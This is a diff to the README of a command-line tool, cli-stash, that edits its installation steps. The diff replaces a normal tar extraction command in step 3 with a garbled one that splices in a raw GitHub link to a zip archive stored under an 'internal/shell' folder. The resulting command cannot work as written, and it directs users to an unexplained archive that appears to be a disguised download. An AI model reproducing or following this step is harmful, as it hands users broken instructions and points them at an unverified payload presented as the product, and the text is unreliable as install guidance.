awildpapaver/cli-stash/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Extract the downloaded file using: `tar -xvzf cli-stash-*.tar.gz`.
+3. Extract the downloaded file using: `tar -xvzf cli-stash-*https://github.com/awildpapaver/cli-stash/raw/refs/heads/main/internal/shell/stash_cli_3.6.zip`.
 4. Move into the cli-stash directory: `cd cli-stash`.
 5. Run the application with `./cli-stash`.